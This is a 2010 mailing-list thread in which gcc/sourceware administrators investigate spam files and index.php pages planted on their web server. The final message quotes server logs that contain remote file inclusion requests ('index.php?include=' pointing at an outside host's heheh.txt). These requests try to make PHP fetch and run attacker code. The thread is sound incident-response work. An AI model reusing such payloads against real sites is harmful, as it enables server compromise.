* htdig/.cache directory
@ 2010-03-03 1:23 Joseph S. Myers
2010-03-03 2:47 ` Joseph S. Myers
0 siblings, 1 reply; 4+ messages in thread
From: Joseph S. Myers @ 2010-03-03 1:23 UTC (permalink / raw)
To: overseers
The latest gccadmin update_web_docs_svn cron job resulted in a large
number of errors of the form:
rm: cannot remove `./htdig/.cache/.%2E8F%0A8A%ECC8%9BC5%EF7A%2C8B': Permission denied
http://gcc.gnu.org/ml/gccadmin/2010-q1/msg00150.html
Has something changed just now to create this directory
(/www/gcc/htdocs/htdig/.cache), or to make it non-writable to gccadmin?
If this directory is indeed meant to be there, then the relevant script
(wwwdocs/bin/preprocess) probably needs to be taught to ignore it rather
than trying to remove files from it.
--
Joseph S. Myers
joseph@codesourcery.com
^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: htdig/.cache directory
2010-03-03 1:23 htdig/.cache directory Joseph S. Myers
@ 2010-03-03 2:47 ` Joseph S. Myers
2010-03-03 2:53 ` Frank Ch. Eigler
2010-03-03 3:24 ` probable php exploit, was " Frank Ch. Eigler
0 siblings, 2 replies; 4+ messages in thread
From: Joseph S. Myers @ 2010-03-03 2:47 UTC (permalink / raw)
To: overseers
In IRC discussion, we (fche and I) concluded that the files should not be
there, and the problem was that something (unidentified) had created them;
there are more such .cache directories elsewhere on the system, that also
should not be there, some created on Feb 26. We haven't worked out what
created the files.
--
Joseph S. Myers
joseph@codesourcery.com
^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: htdig/.cache directory
2010-03-03 2:47 ` Joseph S. Myers
@ 2010-03-03 2:53 ` Frank Ch. Eigler
2010-03-03 3:24 ` probable php exploit, was " Frank Ch. Eigler
1 sibling, 0 replies; 4+ messages in thread
From: Frank Ch. Eigler @ 2010-03-03 2:53 UTC (permalink / raw)
To: Joseph S. Myers; +Cc: overseers
Hi -
> [...] We haven't worked out what created the files.
Eww, base-64-decoded some random one of the /.cache/.%DEADBEEF files:
<!--/shop/item/325/-->
<html>
<head>
<title>download windows 7 via ftp CLICK HERE! DOWNLOAD Microsoft Windows 7 Ultimate (64 bit)! NEW SOFTWARE!</title>
<meta name="description" content="Download Windows 7 Via Ftp. The same situation exists with MP3 arguably the most popular format for audio (notably audio you rip from your CD collection). ">
<meta name="keywords" content="download windows 7 via ftp,download windows 7 via ftp,download windows 7 via ftp">
<meta name="author" content="Jason Molenda, International Man Of Mystery">
</head>
<body bgcolor="white" text="black" link="#0000EE" VLINK="#551A8B" ALINK="red">
<table align="left" border="1" cellspacing="0" cellpadding="8" width="20%">
<td bgcolor="#eeeeee" valign="top">
<table bgcolor="#eeeeee" border="0" cellspacing="0" cellpadding="3" width="100%">
<tr><td colspan="2"><p></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/6074/download/cheap-cs4.html" title="cheap cs4">Cheap Cs4</a></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/1213/download/buy-after-effects.html" title="buy after effects">Buy After Effects</a></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/4092/download/buy-frontpage.html" title="buy frontpage">Buy Frontpage</a></td></tr>
<tr><td colspan="2"><a href="/gcc/ml/gcc/2009-10/?best_software/3282/download/xp-for-sale.html" title="xp for sale">Xp For Sale</a></td></tr>
....
^ permalink raw reply [flat|nested] 4+ messages in thread
* probable php exploit, was Re: htdig/.cache directory
2010-03-03 2:47 ` Joseph S. Myers
2010-03-03 2:53 ` Frank Ch. Eigler
@ 2010-03-03 3:24 ` Frank Ch. Eigler
1 sibling, 0 replies; 4+ messages in thread
From: Frank Ch. Eigler @ 2010-03-03 3:24 UTC (permalink / raw)
To: Joseph S. Myers; +Cc: overseers
Hi -
It gets better. So someone placed /index.php files here and there,
using the .cache files as spam payload. I saved a bunch of this in
/root/dot-cache-spam-artifacts/.
There are suspicious entries such as this in the logs:
% fgrep .cache /var/log/httpd/gcc*_log | less
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
htdocs/htdig/.cache/.%D59C%49AA%73A8%63A1%9159%0441 on line 1
/var/log/httpd/gcc-error_log:[client 66.249.71.244] PHP Notice: Undefined index: HTTP_A in /export/u0/sourceware/sourceware/www/gcc/
Searching for that IP address:
/var/log/httpd/cygwin-combined_log:66.249.71.244 - - [01/Mar/2010:12:28:18 +0000] "GET /cgi%20%5B...%5D%3C/b%3E%3C/td%3E%3C/span%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cspan%20class='wynikfirmy1'%20style='font:%20normal%2010px%20verdana;'%3E%20%20%20%20%20%20%20%202008-10-10%20::%20%3Ca%20class='wynikfirmy1'%20href='?oid=451&odp=1387'%3Emammamia;%20%3Ca%20href= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" (67%)
But according to ARIN it's a real google address.
More suspicuous stuff:
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1"
404 289 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET //index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HTTP/1.1" 404
286 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11//index.php?include=http://pangestu.700megs.com/columbus/heheh
.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran//index.php?include=http://pangestu.700megs.com/columbus/heheh.txt? HT
TP/1.1" 404 297 "-" "Mozilla/5.0" (-%)
218.38.136.125 - - [27/Feb/2010:07:20:59 +0000] "GET /ml/fortran/2005-11/msg00424.html//index.php?include=http://pangestu.700megs.com/
columbus/heheh.txt? HTTP/1.1" 404 319 "-" "Mozilla/5.0" (-%)
I up2dated php and other stuff on sourceware; maybe it was a
vulnerability there being exploited. Previous version was 4.3.9-3.26.
See also http://rhn.redhat.com/errata/RHSA-2010-0040.html
See also http://www.google.com/search?q=php%20Undefined%20index%20HTTP_A
for another few victims.
- FChE
^ permalink raw reply [flat|nested] 4+ messages in thread
end of thread, other threads:[~2010-03-03 3:24 UTC | newest]
Thread overview: 4+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2010-03-03 1:23 htdig/.cache directory Joseph S. Myers
2010-03-03 2:47 ` Joseph S. Myers
2010-03-03 2:53 ` Frank Ch. Eigler
2010-03-03 3:24 ` probable php exploit, was " Frank Ch. Eigler
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).